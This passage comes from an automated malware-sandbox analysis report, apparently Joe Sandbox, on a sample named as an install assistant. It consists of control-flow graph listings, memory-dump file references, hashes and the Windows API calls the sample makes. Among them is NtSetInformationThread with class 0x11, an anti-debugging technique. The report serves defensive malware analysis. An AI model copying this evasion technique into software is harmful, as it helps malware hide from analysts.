7898->7902 7899->7859 7900->7894 7901->7898 7905 6bf43e76-6bf43e79 7902->7905 7907 6bf43e36-6bf43e3d 7903->7907 7908 6bf43dde-6bf43e17 7903->7908 7905->7877 7910 6bf43e5c-6bf43e5f 7907->7910 7911 6bf43e3f-6bf43e5a 7907->7911 7908->7901 7910->7900 7913 6bf43e65-6bf43e69 7910->7913 7911->7901 7913->7898 7913->7905 7919 6bf44020-6bf44026 7915->7919 7920 6bf43fa3-6bf43fa8 7915->7920 7923 6bf43f06-6bf43f35 7919->7923 7924 6bf4402c-6bf4403c 7919->7924 7921 6bf4407c-6bf44081 7920->7921 7922 6bf43fae-6bf43fcf 7920->7922 7927 6bf44083-6bf4408a 7921->7927 7928 6bf440aa-6bf440ae 7921->7928 7922->7928 7929 6bf43f38-6bf43f61 7923->7929 7925 6bf440b3-6bf440b8 7924->7925 7926 6bf4403e-6bf44058 7924->7926 7925->7922 7933 6bf440be-6bf440c9 7925->7933 7930 6bf4405a-6bf44063 7926->7930 7927->7929 7931 6bf44090 7927->7931 7932 6bf43f6b-6bf43f6f 7928->7932 7934 6bf43f64-6bf43f67 7929->7934 7935 6bf440f5-6bf4413f 7930->7935 7936 6bf44069-6bf4406c 7930->7936 7931->7897 7932->7915 7933->7928 7937 6bf440cb-6bf440d4 7933->7937 7938 6bf43f69 7934->7938 7935->7938 7939 6bf44144-6bf4414b 7936->7939 7940 6bf44072-6bf44077 7936->7940 7941 6bf440d6-6bf440f0 7937->7941 7942 6bf440a7 7937->7942 7938->7932 7939->7932 7940->7934 7941->7930 7942->7928
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                        • Instruction ID: 59afb264bfff17e612940b26b4fe49ec36c2c88d8e36a3867b4838c4ff3531be
                                        • Opcode Fuzzy Hash: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                        • Instruction Fuzzy Hash: 2A32C433245B018FC334CF28C890695BBE3EFD5314B698A6DC0EA5B666D779B44ACB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7969 6bf43a6a-6bf43a85 7970 6bf43a87-6bf43aa7 7969->7970 7971 6bf43aa9-6bf43ab0 7970->7971 7972 6bf43960-6bf43964 7971->7972 7973 6bf43860-6bf4388e 7972->7973 7974 6bf4396a 7972->7974 7983 6bf43894-6bf43896 7973->7983 7984 6bf43970-6bf4397d 7973->7984 7975 6bf43ba1-6bf43bb6 7974->7975 7977 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7975->7977 7992 6bf43be0-6bf43bfe 7977->7992 7983->7984 7986 6bf4389c-6bf438b9 7983->7986 7987 6bf439f1-6bf439f8 7984->7987 7988 6bf4397f-6bf43989 7984->7988 7990 6bf438c0-6bf438c1 7986->7990 7993 6bf43ab5-6bf43aba 7987->7993 7994 6bf439fe-6bf43a03 7987->7994 7988->7986 7991 6bf4398f-6bf43994 7988->7991 7995 6bf4395e 7990->7995 7997 6bf43b16-6bf43b18 7991->7997 7998 6bf4399a-6bf4399f 7991->7998 8014 6bf43c04-6bf43c11 7992->8014 8015 6bf43e7b 7992->8015 7993->7986 7996 6bf43ac0-6bf43ac7 7993->7996 8000 6bf438d2-6bf438d4 7994->8000 8001 6bf43a09-6bf43a2f 7994->8001 7995->7972 7996->7990 8003 6bf43acd-6bf43ad6 7996->8003 7997->7990 8004 6bf439a5-6bf439bf 7998->8004 8005 6bf4383b-6bf43855 call 6c091470 call 6c091480 7998->8005 8002 6bf43957-6bf4395c 8000->8002 8007 6bf43a35-6bf43a3a 8001->8007 8008 6bf438f8-6bf43955 8001->8008 8002->7995 8003->7997 8011 6bf43ad8-6bf43aeb 8003->8011 8013 6bf43a5a-6bf43a5d 8004->8013 8005->7973 8009 6bf43a40-6bf43a57 8007->8009 8010 6bf43b1d-6bf43b22 8007->8010 8008->8002 8009->8013 8019 6bf43b24-6bf43b44 8010->8019 8020 6bf43b49-6bf43b50 8010->8020 8011->8008 8016 6bf43af1-6bf43af8 8011->8016 8013->7970 8013->7971 8021 6bf43c17-6bf43c20 8014->8021 8022 6bf43ce0-6bf43cea 8014->8022 8018 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 8015->8018 8027 6bf43b62-6bf43b85 8016->8027 8028 6bf43afa-6bf43aff 8016->8028 8046 6bf43eea-6bf43f04 call 6c091470 call 6c091480 8018->8046 8019->7970 8020->7990 8031 6bf43b56-6bf43b5d 8020->8031 8023 6bf43dc5 8021->8023 8024 6bf43c26-6bf43c2d 8021->8024 8025 6bf43cec-6bf43d0c 8022->8025 8026 6bf43d3a-6bf43d3c 8022->8026 8039 6bf43dc6 8023->8039 8032 6bf43dc3 8024->8032 8033 6bf43c33-6bf43c3a 8024->8033 8034 6bf43d90-6bf43d95 8025->8034 8035 6bf43d70-6bf43d8d 8026->8035 8036 6bf43d3e-6bf43d45 8026->8036 8027->8008 8040 6bf43b8b 8027->8040 8028->8002 8031->7972 8032->8023 8041 6bf43e26-6bf43e2b 8033->8041 8042 6bf43c40-6bf43c5b 8033->8042 8044 6bf43d97-6bf43db8 8034->8044 8045 6bf43dba-6bf43dc1 8034->8045 8035->8034 8043 6bf43d50-6bf43d57 8036->8043 8047 6bf43dc8-6bf43dcc 8039->8047 8040->7975 8048 6bf43e31 8041->8048 8049 6bf43c7b-6bf43cd0 8041->8049 8050 6bf43e1b-6bf43e24 8042->8050 8043->8039 8044->8023 8045->8032 8052 6bf43dd7-6bf43ddc 8045->8052 8064 6bf43f75-6bf43fa1 8046->8064 8047->7992 8051 6bf43dd2 8047->8051 8048->7977 8049->8043 8050->8047 8054 6bf43e76-6bf43e79 8051->8054 8056 6bf43e36-6bf43e3d 8052->8056 8057 6bf43dde-6bf43e17 8052->8057 8054->8018 8059 6bf43e5c-6bf43e5f 8056->8059 8060 6bf43e3f-6bf43e5a 8056->8060 8057->8050 8059->8049 8062 6bf43e65-6bf43e69 8059->8062 8060->8050 8062->8047 8062->8054 8068 6bf44020-6bf44026 8064->8068 8069 6bf43fa3-6bf43fa8 8064->8069 8072 6bf43f06-6bf43f35 8068->8072 8073 6bf4402c-6bf4403c 8068->8073 8070 6bf4407c-6bf44081 8069->8070 8071 6bf43fae-6bf43fcf 8069->8071 8076 6bf44083-6bf4408a 8070->8076 8077 6bf440aa-6bf440ae 8070->8077 8071->8077 8078 6bf43f38-6bf43f61 8072->8078 8074 6bf440b3-6bf440b8 8073->8074 8075 6bf4403e-6bf44058 8073->8075 8074->8071 8082 6bf440be-6bf440c9 8074->8082 8079 6bf4405a-6bf44063 8075->8079 8076->8078 8080 6bf44090 8076->8080 8081 6bf43f6b-6bf43f6f 8077->8081 8083 6bf43f64-6bf43f67 8078->8083 8084 6bf440f5-6bf4413f 8079->8084 8085 6bf44069-6bf4406c 8079->8085 8080->8046 8081->8064 8082->8077 8086 6bf440cb-6bf440d4 8082->8086 8087 6bf43f69 8083->8087 8084->8087 8088 6bf44144-6bf4414b 8085->8088 8089 6bf44072-6bf44077 8085->8089 8090 6bf440d6-6bf440f0 8086->8090 8091 6bf440a7 8086->8091 8087->8081 8088->8081 8089->8083 8090->8079 8091->8077
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                        • Instruction ID: ab7aa1011ceff4506394b6351b08b95281a1150b487f92f5837ad1ba442abbc5
                                        • Opcode Fuzzy Hash: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                        • Instruction Fuzzy Hash: 6E51C1335447018FD3308F28C4807D5BBE3BF95314F698A6DC0E65B6A6DB79B44A8B51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                        • Instruction ID: 4014eebf325d4c710564b06a9eb85b1691d66c16e54d0f856b44d81acc025282
                                        • Opcode Fuzzy Hash: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                        • Instruction Fuzzy Hash: 5951B333504B118FD330CF28C480795BBE3BF95314F658A6DC0E65B6A6DB79B44A8B51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                        • Instruction ID: 3d4dd3b0884c6f20aa22afd36e391670539d840ef3cbbec3cfa830bccfd9e0c1
                                        • Opcode Fuzzy Hash: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                        • Instruction Fuzzy Hash: D531E133649B01CBD730CF28C8847C6BBA3AF96314F154A6DC0A65B6A2DB7974099B51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                        • Instruction ID: 6bf8a384f14df3466f3807ac1f142a21085414fd86bf4a892959dfca9bb1b73a
                                        • Opcode Fuzzy Hash: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                        • Instruction Fuzzy Hash: 1631EF33108B01CBD734CF28C490796BBB6AF96304F254A6DC0EA5B2A6DB7974498B51
                                        APIs
                                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0C5130
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ManagerOpen
                                        • String ID:
                                        • API String ID: 1889721586-0
                                        • Opcode ID: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                        • Instruction ID: 276ea8ff09ed4d7a2cbefdec9af00a980189ad76ce56daa0fd2b30805fda045c
                                        • Opcode Fuzzy Hash: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                        • Instruction Fuzzy Hash: E0312AB8608351EFC7108F28C548B0EBBF0EB89B54F51895EF988C6360C371C945AB53
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                        • Instruction ID: d789932a80e930c41b5f1d077c321694e39bd6cc2d605965f7ee55d8831fde09
                                        • Opcode Fuzzy Hash: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                        • Instruction Fuzzy Hash: 6321F733118701CBD734CF28C890796BFB6AF86304F144A2DD0A6572A2DF7974048B51
                                        APIs
                                        • FindFirstFileA.KERNEL32(?,?), ref: 6C0BAEDC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                        • Instruction ID: 5c7a427db91109efa55fe9784d8214cf71f6c3ed6644c7bdace0f213e6d74acc
                                        • Opcode Fuzzy Hash: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                        • Instruction Fuzzy Hash: A51166B0408362AFD710CB68D44469EBBE4BF86314F248E59F0A8DB690D335CC848B26
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C09ABA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                        • API String ID: 2738559852-1563143607
                                        • Opcode ID: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                        • Instruction ID: 4fcb24f697c6b72885c7ef9fcf67624e9ca5f60716de709afc124eb71c058960
                                        • Opcode Fuzzy Hash: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                        • Instruction Fuzzy Hash: A6624770A0D3818FC724CF18C490B5EBBE2ABDA314F24991EE9A9CB751D734D945AB43

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6824 6c0dcad3-6c0dcae3 6825 6c0dcafd-6c0dcaff 6824->6825 6826 6c0dcae5-6c0dcaf8 call 6c0cf9df call 6c0cf9cc 6824->6826 6828 6c0dcb05-6c0dcb0b 6825->6828 6829 6c0dce64-6c0dce71 call 6c0cf9df call 6c0cf9cc 6825->6829 6843 6c0dce7c 6826->6843 6828->6829 6832 6c0dcb11-6c0dcb37 6828->6832 6848 6c0dce77 call 6c0d0120 6829->6848 6832->6829 6835 6c0dcb3d-6c0dcb46 6832->6835 6838 6c0dcb48-6c0dcb5b call 6c0cf9df call 6c0cf9cc 6835->6838 6839 6c0dcb60-6c0dcb62 6835->6839 6838->6848 6841 6c0dcb68-6c0dcb6b 6839->6841 6842 6c0dce60-6c0dce62 6839->6842 6841->6842 6847 6c0dcb71-6c0dcb75 6841->6847 6846 6c0dce7f-6c0dce82 6842->6846 6843->6846 6847->6838 6850 6c0dcb77-6c0dcb8e 6847->6850 6848->6843 6853 6c0dcbdf-6c0dcbe5 6850->6853 6854 6c0dcb90-6c0dcb93 6850->6854 6855 6c0dcbab-6c0dcbc2 call 6c0cf9df call 6c0cf9cc call 6c0d0120 6853->6855 6856 6c0dcbe7-6c0dcbf1 6853->6856 6857 6c0dcb95-6c0dcb9e 6854->6857 6858 6c0dcba3-6c0dcba9 6854->6858 6888 6c0dcd97 6855->6888 6859 6c0dcbf8-6c0dcc16 call 6c0d47f5 call 6c0d47bb * 2 6856->6859 6860 6c0dcbf3-6c0dcbf5 6856->6860 6861 6c0dcc63-6c0dcc73 6857->6861 6858->6855 6862 6c0dcbc7-6c0dcbda 6858->6862 6898 6c0dcc18-6c0dcc2e call 6c0cf9cc call 6c0cf9df 6859->6898 6899 6c0dcc33-6c0dcc5c call 6c0dac69 6859->6899 6860->6859 6864 6c0dcc79-6c0dcc85 6861->6864 6865 6c0dcd38-6c0dcd41 call 6c0e19e5 6861->6865 6862->6861 6864->6865 6869 6c0dcc8b-6c0dcc8d 6864->6869 6877 6c0dcdb4 6865->6877 6878 6c0dcd43-6c0dcd55 6865->6878 6869->6865 6873 6c0dcc93-6c0dccb7 6869->6873 6873->6865 6879 6c0dccb9-6c0dcccf 6873->6879 6881 6c0dcdb8-6c0dcdd0 ReadFile 6877->6881 6878->6877 6883 6c0dcd57-6c0dcd66 GetConsoleMode 6878->6883 6879->6865 6884 6c0dccd1-6c0dccd3 6879->6884 6886 6c0dce2c-6c0dce37 GetLastError 6881->6886 6887 6c0dcdd2-6c0dcdd8 6881->6887 6883->6877 6889 6c0dcd68-6c0dcd6c 6883->6889 6884->6865 6890 6c0dccd5-6c0dccfb 6884->6890 6892 6c0dce39-6c0dce4b call 6c0cf9cc call 6c0cf9df 6886->6892 6893 6c0dce50-6c0dce53 6886->6893 6887->6886 6894 6c0dcdda 6887->6894 6896 6c0dcd9a-6c0dcda4 call 6c0d47bb 6888->6896 6889->6881 6895 6c0dcd6e-6c0dcd88 ReadConsoleW 6889->6895 6890->6865 6897 6c0dccfd-6c0dcd13 6890->6897 6892->6888 6905 6c0dce59-6c0dce5b 6893->6905 6906 6c0dcd90-6c0dcd96 call 6c0cf9f2 6893->6906 6901 6c0dcddd-6c0dcdef 6894->6901 6903 6c0dcda9-6c0dcdb2 6895->6903 6904 6c0dcd8a GetLastError 6895->6904 6896->6846 6897->6865 6908 6c0dcd15-6c0dcd17 6897->6908 6898->6888 6899->6861 6901->6896 6911 6c0dcdf1-6c0dcdf5 6901->6911 6903->6901 6904->6906 6905->6896 6906->6888 6908->6865 6915 6c0dcd19-6c0dcd33 6908->6915 6919 6c0dce0e-6c0dce19 6911->6919 6920 6c0dcdf7-6c0dce07 call 6c0dcefe 6911->6920 6915->6865 6925 6c0dce1b call 6c0dce83 6919->6925 6926 6c0dce25-6c0dce2a call 6c0dd1b6 6919->6926 6930 6c0dce0a-6c0dce0c 6920->6930 6931 6c0dce20-6c0dce23 6925->6931 6926->6931 6930->6896 6931->6930
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                        • Instruction ID: 9e23766200c2eddb9da858e99af33fecd5a3cc8727d7228e74a469e9ae89f459
                                        • Opcode Fuzzy Hash: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                        • Instruction Fuzzy Hash: 17C1C170A04349AFDF01DFA8C880BADBBF5AF4A318F624159E810AB781C775B945CF61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6933 6c0e406c-6c0e409c call 6c0e44ec 6936 6c0e409e-6c0e40a9 call 6c0cf9df 6933->6936 6937 6c0e40b7-6c0e40c3 call 6c0e160c 6933->6937 6942 6c0e40ab-6c0e40b2 call 6c0cf9cc 6936->6942 6943 6c0e40dc-6c0e4125 call 6c0e4457 6937->6943 6944 6c0e40c5-6c0e40da call 6c0cf9df call 6c0cf9cc 6937->6944 6953 6c0e4391-6c0e4395 6942->6953 6951 6c0e4127-6c0e4130 6943->6951 6952 6c0e4192-6c0e419b GetFileType 6943->6952 6944->6942 6956 6c0e4167-6c0e418d GetLastError call 6c0cf9f2 6951->6956 6957 6c0e4132-6c0e4136 6951->6957 6958 6c0e419d-6c0e41ce GetLastError call 6c0cf9f2 CloseHandle 6952->6958 6959 6c0e41e4-6c0e41e7 6952->6959 6956->6942 6957->6956 6962 6c0e4138-6c0e4165 call 6c0e4457 6957->6962 6958->6942 6970 6c0e41d4-6c0e41df call 6c0cf9cc 6958->6970 6960 6c0e41e9-6c0e41ee 6959->6960 6961 6c0e41f0-6c0e41f6 6959->6961 6965 6c0e41fa-6c0e4248 call 6c0e17b0 6960->6965 6961->6965 6966 6c0e41f8 6961->6966 6962->6952 6962->6956 6976 6c0e424a-6c0e4256 call 6c0e4666 6965->6976 6977 6c0e4267-6c0e428f call 6c0e4710 6965->6977 6966->6965 6970->6942 6976->6977 6984 6c0e4258 6976->6984 6982 6c0e4294-6c0e42d5 6977->6982 6983 6c0e4291-6c0e4292 6977->6983 6986 6c0e42f6-6c0e4304 6982->6986 6987 6c0e42d7-6c0e42db 6982->6987 6985 6c0e425a-6c0e4262 call 6c0db925 6983->6985 6984->6985 6985->6953 6989 6c0e438f 6986->6989 6990 6c0e430a-6c0e430e 6986->6990 6987->6986 6988 6c0e42dd-6c0e42f1 6987->6988 6988->6986 6989->6953 6990->6989 6993 6c0e4310-6c0e4343 CloseHandle call 6c0e4457 6990->6993 6996 6c0e4377-6c0e438b 6993->6996 6997 6c0e4345-6c0e4371 GetLastError call 6c0cf9f2 call 6c0e171f 6993->6997 6996->6989 6997->6996
                                        APIs
                                          • Part of subcall function 6C0E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
